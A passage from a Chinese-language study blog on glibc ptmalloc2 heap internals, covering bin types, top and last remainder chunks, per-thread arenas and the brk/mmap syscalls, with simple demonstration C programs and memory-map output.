类型。这样可以避免 header 类型及其特殊处理。但是,为了节省空间和提高局部性,只分配 bin 的 fd/bk 指针,然后使用 repositioning tricks 将这些指针视为一个malloc_chunk*的字段。<br>以 32 位系统为例,bins 前 4 项的含义如下:</p><table><thead><tr><th style="text-align:left">bin 下标</th><th style="text-align:left">含义</th></tr></thead><tbody><tr><td style="text-align:left">0</td><td style="text-align:left">bin1 的 fd / bin2 的 prev_size</td></tr><tr><td style="text-align:left">1</td><td style="text-align:left">bin1 的 bk / bin2 的 size</td></tr><tr><td style="text-align:left">2</td><td style="text-align:left">bin2 的 fd / bin3 的 prev_size</td></tr><tr><td style="text-align:left">3</td><td style="text-align:left">bin2 的 bk / bin3 的 size</td></tr></tbody></table><p>bin2 的 prev_size、size 和 bin1 的 fd、bk 是重合的。由于我们只会使用 fd 和 bk 来索引链表,所以该重合部分的数据其实记录的是 bin1 的 fd、bk。 也就是说,虽然后一个 bin 和前一个 bin 共用部分数据,但是其实记录的仍然是前一个 bin 的链表数据。通过这样的复用,可以节省空间。</p><p>数组中的 bin 依次如下</p><ol><li>第一个为 unsorted bin,字如其面,这里面的 chunk 没有进行排序,存储的 chunk 比较杂。</li><li>索引从 2 到 63 的 bin 称为 small bin,同一个 small bin 链表中的 chunk 的大小相同。两个相邻索引的 small bin 链表中的 chunk 大小相差的字节数为 2 个机器字长,即 32 位相差 8 字节,64 位相差 16 字节。</li><li>small bins 后面的 bin 被称作 large bins。large bins 中的每一个 bin 都包含一定范围内的 chunk,其中的 chunk 按 fd 指针的顺序从大到小排列。相同大小的 chunk 同样按照最近使用顺序排列。</li></ol><blockquote><p>fastbin的使用标记总是被置1的,所以不会被处理。</p></blockquote><h3 id="fast-bin">Fast Bin</h3><p>大小为 16 ~ 80字节的chunk被称为fast chunk。在所有的bins中,fast bins路径享有最快的内存分配及释放速度。</p><ul><li><strong>数量</strong>:10</li><li>每个 fast bin 都维护着一条 free chunk 的单链表,采用单链表是因为链表中所有 chunk 的大小相等,增删 chunk 发生在链表顶端即可;—— LIFO(Last in first out)</li><li>chunk 大小:8 字节递增</li><li>fast bins 由一系列所维护 chunk 大小以 8 字节递增的 bins 组成。也即,<code>fast bin[0]</code> 维护大小为 16 字节的 chunk、<code>fast bin[1]</code> 维护大小为 24 字节的 chunk。依此类推……</li><li>指定 fast bin 中所有 chunk 大小相同;</li><li>在 malloc 初始化过程中,最大的 fast bin 的大小被设置为 64 而非 80 字节。因为默认情况下只有大小 16 ~ 64 的 chunk 被归为 fast chunk 。</li><li>无需合并 —— 两个相邻 chunk 不会被合并。虽然这可能会加剧内存碎片化,但也大大加速了内存释放的速度!</li><li><code>malloc(fast chunk)</code></li><li>初始情况下 fast chunck 最大尺寸以及 fast bin 相应数据结构均未初始化,因此即使用户请求内存大小落在 fast chunk 相应区间,服务用户请求的也将是 small bin 路径而非 fast bin 路径;</li><li>初始化后,将在计算 fast bin 索引后检索相应 bin;</li><li>相应 bin 中被检索的第一个 chunk 将被摘除并返回给用户。</li><li><code>free(fast chunk)</code><ul><li>计算 fast bin 索引以索引相应 bin;</li><li><code>free</code> 掉的 chunk 将被添加到上述 bin 的顶端。<br><img src="/images/heap_glibc_malloc_bin/fast_chunk.png" alt="fast_chunk.png"></li></ul></li></ul><h3 id="unsorted-bin">Unsorted Bin</h3><p>当small chunk和large chunk被free掉的时候,它们并不是被添加到各自的bin中,而是被添加在unsorted bin中,这使得分配器可以重新使用最近被free掉的chunk,从而消除寻找合适的bin的时间开销,提升内存分配和释放的效率。</p><blockquote><p>何时,unsorted bin的chunks会移动到small/large chunk中? —> 在内存分配的时候,在前后检索fast/small bins未果之后,在特定条件下,会将unsorted bin中的 chunks转移到合适的bin中去(small/large)。</p></blockquote><h4 id="数量-大小">数量-大小</h4><ul><li>unsorted bin包括一个用于保存free chunk的双向链表。</li><li>chunk的大小无限制,任何大小的chunk均可以添加到这里。<br><img src="/images/heap_glibc_malloc_bin/unsorted_bin.png" alt></li></ul><h3 id="small-bin">Small Bin</h3><p>大小小于512字节的chunk被成为small chunk,保存small chunks的bin被称为small bin.</p><h4 id="数量-大小">数量-大小</h4><ul><li>数量:62<ul><li>每个small bin都维护着一条free chunk的双向循环链表。采用双向链表的原因是,small bins中的chunk可能会从链表中部摘除。这里新增项放在链表的头部位置,而从链表的尾部位置移除项。</li></ul></li><li>chunk大小:8字节递增。<ul><li>Small bins 由一系列所维护 chunk 大小以 8 字节递增的 bins 组成。举例而言,small bin[0] (Bin 2)维护着大小为 16 字节的 chunks、small bin[1](Bin 3)维护着大小为 24 字节的 chunks ,依此类推……指定 small bin 中所有 chunk 大小均相同,因此无需排序。</li></ul></li></ul><h4 id="合并">合并</h4><p>相邻的free chunk将被合并,这减缓了内存碎片化,但是减慢了 <code>free</code> 的速度</p><h4 id="malloc-small-chunk">malloc(small chunk)</h4><ul><li>初始情况下,small bins都是NULL,因此尽管用户请求small chunk,提供服务的将是unsorted bin 路径而不是small bin路径;</li><li>第一次调用malloc时,维护在 malloc_state中的small bins和large bins将被初始化,它们都会指向自身以表示其为空;</li><li>此后当small bin非空,相应的bin会摘除其中最后一个chunk并返回给用户;</li></ul><h4 id="free-small-chunk">free(small chunk)</h4><p><code>free</code> chunk 的时候,检查其前后的chunk是否空闲,若是则合并,也即把它们从所属的链表中摘除并合并成一个新的chunk,新chunk会添加在unsorted bin的前端。</p><h3 id="large-bin">Large Bin</h3><h4 id="大小-数量">大小-数量</h4><ul><li>数量:62<ul><li>每个large bin都维护着一条free chunk的双向循环链表。采用双向链表的原因是,large bins中的chunk可能会从链表中的任意位置插入及删除。</li></ul></li><li>大小:large bin中所有chunk大小不一定相同,各chunk大小递减保存。最大的chunk保存顶端,而最小的chunk保存在尾端;<ul><li>这 63 个 bins<ul><li>32 个 bins 所维护的 chunk 大小以 64B 递增,也即 large chunk[0](Bin 65) 维护着大小为 512B ~ 568B 的 chunk 、large chunk[1](Bin 66) 维护着大小为 576B ~ 632B 的 chunk,依此类推……</li><li>16 个 bins 所维护的 chunk 大小以 512 字节递增;</li><li>8 个 bins 所维护的 chunk 大小以 4096 字节递增;</li><li>4 个 bins 所维护的 chunk 大小以 32768 字节递增;</li><li>2 个 bins 所维护的 chunk 大小以 262144 字节递增;</li><li>1 个 bin 维护所有剩余 chunk 大小;</li></ul></li></ul></li></ul><h4 id="合并">合并</h4><p>两个相邻的空闲 chunk 会被合并</p><h4 id="malloc-large-chunk">malloc(large chunk)</h4><ul><li>初始情况下,large bin都会是NULL,因此尽管用户请求large chunk,提供服务的将是next largetst bin路径而不是large bin路径。</li><li>第一次调用malloc时,维护在malloc_state中的small bin和large bin将被初始化,它们都会指向自身以表示其为空;</li><li>此后当large bin非空,如果相应bin中的最大chunk大小大于用户请求大小,分配器就从该bin顶端遍历到尾端,以找到一个大小最接近用户请求的chunk。一旦找到,相应chunk就会被切分成两块:<ul><li>User chunk(用户请求大小)—— 返回给用户;</li><li>Remainder chunk (剩余大小)—— 添加到unsorted bin。</li></ul></li><li>如果相应bin中的最大 chunk 大小小于用户请求大小,分配器就会扫描binmaps,从而查找最小非空 bin。如果找到了这样的bin,就从中选择合适的chunk并切割给用户;反之就使用top chunk响应用户请求。</li></ul><h4 id="free-large-chunk">free(large chunk)</h4><p>类似于 small chunk。</p><h3 id="top-chunk">Top Chunk</h3><p>一个arena中最顶部的chunk被称为top chunk。它不属于任何bin。当所有bin中都没有合适空闲内存时,就会使用top chunk来响应用户请求。</p><p>当top chunk的大小比用户请求的大小大的时候,top chunk会分割为两个部分:</p><ul><li>User chunk,返回给用户;<ul><li>Remainder chunk,剩余部分,将成为新的top chunk。</li></ul></li></ul><p>当top chunk的大小比用户请求的大小小的时候,top chunk就通过 <code>sbrk</code>(main arena)或 <code>mmap</code>( thread arena)系统调用扩容</p><p>top chunk的prev_inuse比特位始终为1,否则其前面的chunk就会被合并到top chunk中。<strong>初始情况下,我们可以将 unsorted chunk 作为 top chunk</strong>。</p><h4 id="last-remainder-chunk">Last Remainder Chunk</h4><p>「last remainder chunk」即最后一次 small request 中因分割而得到的剩余部分,它有利于改进引用局部性,也即后续对 small chunk 的 malloc 请求可能最终被分配得彼此靠近。</p><p>arena 中的若干 chunks,哪个有资格成为 last remainder chunk ?<br>当用户请求 small chunk 而无法从 small bin 和 unsorted bin 得到服务时,分配器就会通过扫描 binmaps 找到最小非空 bin。正如前文所提及的,如果这样的 bin 找到了,其中最合适的 chunk 就会分割为两部分:</p><ul><li>返回给用户的 User chunk</li><li>添加到 unsorted bin 中的 Remainder chunk<br><strong>这一 Remainder chunk 就将成为 last remainder chunk。</strong></li></ul><h1>glibc_malloc_threading</h1><h2 id="多线程支持">多线程支持</h2><p>linux早期使用dlmalloc作为默认分配器,在dlmalloc中只有一个线程能访问临界区(critical section),因为所有线程共享freelist的数据结构。在ptmalloc2中当两个线程同时调用malloc的时候,内存均会得以分配,因为每个线程都维护着单独的堆段,因此维护这些堆的freelist数据结构也是分开的。这种为每个线程维护单独的堆和空闲列表数据结构的行为称为每个线程领域(per thread arena)。</p><h2 id="分析案例">分析案例</h2><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* Per thread arena example. */</span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><pthread.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><sys/types.h></span></span><span class="hljs-type">void</span>* <span class="hljs-title function_">threadFunc</span><span class="hljs-params">(<span class="hljs-type">void</span>* arg)</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Before malloc in thread 1\n"</span>); getchar(); <span class="hljs-type">char</span>* addr = (<span class="hljs-type">char</span>*) <span class="hljs-built_in">malloc</span>(<span class="hljs-number">1000</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After malloc and before free in thread 1\n"</span>); getchar(); <span class="hljs-built_in">free</span>(addr); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After free in thread 1\n"</span>); getchar();}<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> { <span class="hljs-type">pthread_t</span> t1; <span class="hljs-type">void</span>* s; <span class="hljs-type">int</span> ret; <span class="hljs-type">char</span>* addr; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Welcome to per thread arena example::%d\n"</span>,getpid()); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Before malloc in main thread\n"</span>); getchar(); addr = (<span class="hljs-type">char</span>*) <span class="hljs-built_in">malloc</span>(<span class="hljs-number">1000</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After malloc and before free in main thread\n"</span>); getchar(); <span class="hljs-built_in">free</span>(addr); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After free in main thread\n"</span>); getchar(); ret = pthread_create(&t1, <span class="hljs-literal">NULL</span>, threadFunc, <span class="hljs-literal">NULL</span>); <span class="hljs-keyword">if</span>(ret) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Thread creation error\n"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>; } ret = pthread_join(t1, &s); <span class="hljs-keyword">if</span>(ret) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Thread join error\n"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>; } <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>没有产生预期效果(疑似因内核版本不同)</p><h4 id="主线程malloc前">主线程malloc前</h4><div class="code-wrapper"><pre><code class="hljs bash">Welcome to per thread arena example::10710Before malloc <span class="hljs-keyword">in</span> main thread<span class="hljs-built_in">cat</span> /proc/10710/maps00400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="主线程malloc之后">主线程malloc之后</h4><p>主线程的堆是堆内存移动program break产生的(移动brk),即使只申请了1000字节的大小但是实际产生了132kb的堆。这块连续的堆区域被称为arena。因为这个arena是主线程建立的,所以称为main arena。接下来的申请会在arena中的剩余部分进行申请。分配完成或者不够的时候,会继续通过移动brk位置扩容,扩容后top chunk的大小也会随之调整,以将新增加的区域加进去。同时,arena也可以在top chunk过大时缩小。</p><blockquote><p>top chunk 是一个 arena 位于最顶层的 chunk。</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">After malloc and before free <span class="hljs-keyword">in</span> main thread<span class="hljs-built_in">cat</span> /proc/10710/maps00400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="主线程free之后">主线程free之后</h4><p>当分配的内存区域 free 掉时,其并不会立即归还给操作系统,而仅仅是移交给了作为库函数的分配器。这块 free掉的内存添加在了main arenas bin中(在 glibc malloc 中,空闲列表数据结构被称为bin)。随后当用户请求内存时,分配器就不再向内核申请新堆了,而是先试着各个「bin」中查找空闲内存。只有当 bin 中不存在空闲内存时,分配器才会继续向内核申请内存。</p><div class="code-wrapper"><pre><code class="hljs bash">After free <span class="hljs-keyword">in</span> main thread00400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="在thread1-malloc前">在thread1 malloc前</h4><blockquote><p>thread1 的堆尚不存在,但其栈已产生(进入对应的函数了)</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">Before malloc <span class="hljs-keyword">in</span> thread 100400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae130e4000-7fae130e5000 ---p 00000000 00:00 0 7fae130e5000-7fae138e5000 rw-p 00000000 00:00 0 7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="在thread1-malloc之后">在thread1 malloc之后</h4><p>thread1 的堆段建立在了内存映射段中,这也表明了堆内存是使用 mmap 系统调用产生的,而非同主线程一样使用 sbrk 系统调用。类似地,尽管用户只请求了 1000B,但是映射到程地址空间的堆内存足有 1MB。这 1MB 中,只有 132KB 被设置了读写权限,并成为该线程的堆内存。这段连续内存(132KB)被称为thread arena。</p><blockquote><p>注意:当用户请求超过 128KB(比如 malloc(132*1024)) 大小并且此时 arena 中没有足够的空间来满足用户的请求时,内存将通过 mmap 系统调用(不再是 sbrk)分配,而不论请求是发自 main arena 还是 thread arena。</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.soAfter malloc and before free <span class="hljs-keyword">in</span> thread 100400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae0c000000-7fae0c021000 rw-p 00000000 00:00 0 7fae0c021000-7fae10000000 ---p 00000000 00:00 0 7fae130e4000-7fae130e5000 ---p 00000000 00:00 0 7fae130e5000-7fae138e5000 rw-p 00000000 00:00 0 7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="在thread1-free之后">在thread1 free之后</h4><p><code>free</code> 不会把内存归还给操作系统,而是移交给分配器,然后添加在了thread arenas bin中</p><div class="code-wrapper"><pre><code class="hljs bash">After free <span class="hljs-keyword">in</span> thread 100400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae0c000000-7fae0c021000 rw-p 00000000 00:00 0 7fae0c021000-7fae10000000 ---p 00000000 00:00 0 7fae130e4000-7fae130e5000 ---p 00000000 00:00 0 7fae130e5000-7fae138e5000 rw-p 00000000 00:00 0 7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h2 id="总结">总结</h2><p>虽然实际实验的结果并没有那么理想,但是我们可以总结其中我们需要理解的点。</p><ol><li><p>ptmalloc中可以支持多线程同时申请堆块,并且每个线程可以独立管理。</p></li><li><p>主线程中产生的areana是brk产生的,线程中是mmap产生的。</p></li><li><p>第一次brk、mmap的堆空间的申请都会产生一块很大的空间(主:132kb的堆;线程:1MB,132KB 被设置了读写权限)</p></li><li><p>申请的堆空间被free后并不是直接返还,而是给分配器,后续按照bin进行处理管理。</p></li></ol><h1>glibc_malloc_arena</h1><h2 id="arena">Arena</h2><h3 id="arena的数量">arena的数量</h3><p>上面可以见的,主线程中包含main areana,而线程中可以包含其自己管理的thread arena。但是线程拥有的arena数量受限制系统核数(数量过多,开销过高,效率降低)</p><div class="code-wrapper"><pre><code class="hljs bash">For 32 bit systems:Number of arena = 2 * number of cores.For 64 bit systems:Number of arena = 8 * number of cores.</code></pre></div><h3 id="multiple-arena">Multiple Arena</h3><p>(arena共享、复用?)<br>例如,现有有一个场景有一个运行在单核计算机上的32位操作系统上的多线程应用,开启了四个线程(一个主线程+3个线程)。这里的线程数4>(2*1),所以分配器中可能有arena会被线程共享。</p><p>那么如何进行共享的呢?</p><blockquote><ol><li>当主线程第一次调用malloc,已经建立的main areana会被没有任何竞争的使用。</li><li>当thread1和thread2第一次调用malloc的时候,新的 arena 将被创建,且将被没有任何竞争地使用。此时线程和 arena 之间存在一一映射关系。</li><li>当thread3第一次调用 malloc 时,arena 的数量限制被计算出来,结果显示已超出,因此尝试复用已经存在的 arena(也即 Main arena 或 Arena 1 或 Arena 2);</li><li>复用:<ul><li>一旦遍历到可用arena,就开始自旋申请该arena的锁;</li><li>如果上锁成功(比如说main arena上锁成功),就将该arena返回用户;</li><li>如果没找到可用arena,thread 3的malloc将被阻塞,直到有可用的arena为止。</li></ul></li><li>当thread 3调用 malloc时(第二次了),分配器会尝试使用上一次使用的 arena(也即,main arena),从而尽量提高缓存命中率。当 main arena 可用时就用,否则 thread 3 就一直阻塞,直至 main arena 空闲。因此现在 main arena 实际上是被 main thread 和 thread 3 所共享。</li></ol></blockquote><h3 id="multiple-heaps">Multiple Heaps</h3><p>在glibc malloc中主要有3种数据结构:</p><ul><li><a href="https://github.com/sploitfun/lsploits/blob/master/glibc/malloc/arena.c#L59">heap_info</a> ——Heap Header—— 一个thread arena可以维护多个堆。每个堆都有自己的堆 Header(注:也即头部元数据)。一般情况下,每个thread arena都只维护一个堆,什么时候Thread Arena会维护多个堆呢?当这个堆的空间耗尽时,新的堆(而非连续内存区域)就会被mmap到这个 aerna里;</li><li><a href="https://github.com/sploitfun/lsploits/blob/master/glibc/malloc/malloc.c#L1671">malloc_state</a> ——Arena header—— 一个thread arena可以维护多个堆,这些堆另外共享同一个 arena header。Arena header描述的信息包括:bins、top chunk、last remainder chunk等;</li><li><a href="https://github.com/sploitfun/lsploits/blob/master/glibc/malloc/malloc.c#L1108">malloc_chunk</a> ——Chunk header—— 根据用户请求,每个堆被分为若干chunk。每个chunk都有自己的 chunk header。</li></ul><blockquote><p>Main arena无需维护多个堆,因此也无需heap_info。当空间耗尽时,与thread arena不同,main arena可以通过 sbrk拓展堆段,直至堆段碰到内存映射段;<br>与thread arena不同,main arena的arena header不是保存在通过sbrk申请的堆段里,而是作为一个全局变量,可以在libc.so的数据段中找到。</p></blockquote><p><img src="/images/heap_glibc_malloc_bin/threading1.png" alt><br><img src="/images/heap_glibc_malloc_bin/threading2.png" alt></p><h1>glibc_malloc_system_call</h1><h2 id="syscalls-used-by-malloc">Syscalls used by malloc</h2><h3 id="brk">brk</h3><p>brk通过增加程序中断位置(program break location / brk)从内核中获取内存(非零初始化),最初,堆段的起始(start_brk)和结束(brk)指向相同的位置。</p><blockquote><p>当ASLR关闭时,start_brk和brk将指向data/bss段的end(end_data)<br>当ASLR打开时,start_brk和brk将指向data/bss段的end(end_data)加上随机的brk的偏移。</p></blockquote><p><img src="/images/heap_glibc_malloc_bin/start_brk_brk.png" alt></p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* sbrk and brk example */</span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><sys/types.h></span></span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>{ <span class="hljs-type">void</span> *curr_brk, *tmp_brk = <span class="hljs-literal">NULL</span>; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Welcome to sbrk example:%d\n"</span>, getpid()); <span class="hljs-comment">/* sbrk(0) gives current program break location */</span> tmp_brk = curr_brk = sbrk(<span class="hljs-number">0</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Program Break Location1:%p\n"</span>, curr_brk); getchar(); <span class="hljs-comment">/* brk(addr) increments/decrements program break location */</span> brk(curr_brk+<span class="hljs-number">4096</span>); curr_brk = sbrk(<span class="hljs-number">0</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Program break Location2:%p\n"</span>, curr_brk); getchar(); brk(tmp_brk); curr_brk = sbrk(<span class="hljs-number">0</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Program Break Location3:%p\n"</span>, curr_brk); getchar(); <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>输出:</p><div class="code-wrapper"><pre><code class="hljs bash"> ./brk Welcome to sbrk example:6699Program Break Location1:0x21cd000 -> <span class="hljs-built_in">cat</span> map(下)Program <span class="hljs-built_in">break</span> Location2:0x21ce000Program Break Location3:0x21cd000</code></pre></div><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> /proc/6699/maps00400000-00401000 r-xp 00000000 08:01 789617 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/brk00600000-00601000 rw-p 00000000 08:01 789617 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/brk021ac000-021ce000 rw-p 00000000 00:00 0 [heap]7f0b29077000-7f0b29237000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b29237000-7f0b29437000 ---p 001c0000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b29437000-7f0b2943b000 r--p 001c0000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b2943b000-7f0b2943d000 rw-p 001c4000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b2943d000-7f0b29441000 rw-p 00000000 00:00 0 7f0b29441000-7f0b29467000 r-xp 00000000 08:01 2629229 /lib/x86_64-linux-gnu/ld-2.23.so7f0b29642000-7f0b29645000 rw-p 00000000 00:00 0 7f0b29666000-7f0b29667000 r--p 00025000 08:01 2629229 /lib/x86_64-linux-gnu/ld-2.23.so7f0b29667000-7f0b29668000 rw-p 00026000 08:01 2629229 /lib/x86_64-linux-gnu/ld-2.23.so7f0b29668000-7f0b29669000 rw-p 00000000 00:00 0 7ffcb750d000-7ffcb752e000 rw-p 00000000 00:00 0 [stack]7ffcb7598000-7ffcb759b000 r--p 00000000 00:00 0 [vvar]7ffcb759b000-7ffcb759d000 r-xp 00000000 00:00 0 [vdso]ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]</code></pre></div><h3 id="mmap">mmap</h3><p>malloc通过mmap进行私有匿名的段映射。私有匿名映射的目的是分配新内存(零填充),而新内存将由调用进程使用。</p><h4 id="分析实例">分析实例</h4><div class="code-wrapper"><pre><code class="hljs bash">/* Private anonymous mapping example using mmap syscall */<span class="hljs-comment">#include <stdio.h></span><span class="hljs-comment">#include <sys/mman.h></span><span class="hljs-comment">#include <sys/types.h></span><span class="hljs-comment">#include <sys/stat.h></span><span class="hljs-comment">#include <fcntl.h></span><span class="hljs-comment">#include <unistd.h></span><span class="hljs-comment">#include <stdlib.h></span>void static inline errExit(const char* msg){ <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s failed. Exiting the process\n"</span>, msg); <span class="hljs-built_in">exit</span>(-1);}int <span class="hljs-function"><span class="hljs-title">main</span></span>(){ int ret = -1; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Welcome to private anonymous mapping example::PID:%d\n"</span>, getpid()); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Before mmap\n"</span>); getchar(); char* addr = NULL; addr = mmap(NULL, (size_t)132*1024, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); <span class="hljs-keyword">if</span> (addr == MAP_FAILED) errExit(<span class="hljs-string">"mmap"</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After mmap\n"</span>); getchar(); /* Unmap mapped region. */ ret = munmap(addr, (size_t)132*1024); <span class="hljs-keyword">if</span>(ret == -1) errExit(<span class="hljs-string">"munmap"</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After munmap\n"</span>); getchar(); <span class="hljs-built_in">return</span> 0;}</code></pre></div><div class="code-wrapper"><pre><code class="hljs bash">Before mmap 00400000-00401000 r-xp 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap 00600000-00601000 rw-p 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap 00f74000-00f95000 rw-p 00000000 00:00 0 [heap] 7f46271b0000-7f4627370000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.soAfter mmap 00400000-00401000 r-xp 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap 00600000-00601000 rw-p 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap 00f74000-00f95000 rw-p 00000000 00:00 0 [heap] 7f46271b0000-7f4627370000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.soAfter munmap 00400000-00401000 r-xp 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap 00600000-00601000 rw-p 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap 00f74000-00f95000 rw-p 00000000 00:00 0 [heap] 7f46271b0000-7f4627370000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><p>理论上map之后heap段会增加一段我们设置增加的段大小0x21000的,但是实际编译出来没有产生这个效果,不清楚为什么。同样unmap以后增加的映射段会重新减掉恢复成原先映射之前的大小。</p><h3 id="总结">总结</h3><ol><li>brk是将数据段(.data)的最高地址指针_edata往高地址推;malloc小于128k的内存使用brk分配内存。其具体操作示例见下图1,先申请一个30k的堆A,之后再申请B,malloc申请的时候都说edata段的移动既可以完成分配(实际上对应物理页需要等到进程读取内存时,发生缺页中断才会进行分配)。A需要释放的话,需要B提前释放(会产生内存碎片)。</li></ol><p><img src="/images/heap_glibc_malloc_bin/brk_push_edata.jpg" alt></p><ol start="2"><li>mmap是在进程的虚拟地址空间中(堆和栈中间,称为文件映射区域的地方)找一块空闲的虚拟内存进行分配。任意块需要释放可以随时释放。</li></ol><p><img src="/images/heap_glibc_malloc_bin/mmap_chunk.jpg.jpg" alt></p><h1>References</h1><ul><li><a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/">Understanding glibc malloc</a></li><li><a href="https://sploitfun.wordpress.com/2015/02/11/syscalls-used-by-malloc/">syscall used by malloc</a></li><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/heap-structure/#bin">CTF Wiki-堆相关数据结构</a></li><li><a href="https://www.cnblogs.com/vinozly/p/5489138.html">Linux进程分配内存的两种方式–brk() 和mmap()</a></li><li>CSDN<ul><li><a href="https://blog.csdn.net/maokelong95/article/details/51989081">理解 glibc malloc:主流用户态内存分配器实现原理</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366849?spm=1001.2014.3001.5501">堆基础-glibc_malloc_threading</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366820?spm=1001.2014.3001.5501">堆基础-glibc_malloc_system_call</a></li><li><a 